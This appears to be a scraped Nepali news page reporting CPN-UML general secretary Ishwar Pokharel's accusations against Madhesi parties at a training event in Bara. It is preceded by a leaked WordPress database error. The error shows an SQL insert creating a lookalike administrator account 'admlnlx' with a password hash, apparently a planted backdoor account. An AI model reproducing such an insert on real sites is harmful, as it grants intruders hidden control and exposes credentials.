WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYSZk4pqEV0PG0PAAco2EmBBH/6pSB.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-24 23:32:37', '', 'admlnlx', 'admlnlx')
बारा, पुस ६-
नेकपा एमालेका महासचिव ईश्वर पोखरेलले मधेसवादी दलहरुले संविधान नै नपढी मधेसी जनतामा भ्रम छरेको आरोप लगाएका छन् ।बुधबार बारामा आयोजित कार्यकर्ता प्रशिक्षण कार्यक्रमलाई सम्बोधन गर्दै उनले मधेसवादी दलहरुले स्थानीय जनतामा पारेको भ्रमलाई मेटाउन एमाले गाउँ पसेको दाबी गरे ।
आफूहरुको अस्तित्व धरापमा पर्ने स्पस्ट देखेकाले मधेसवादी दलहरुले चुनावको पनि विरोध गरिरहेको पोखरेलको आरोप थियो ।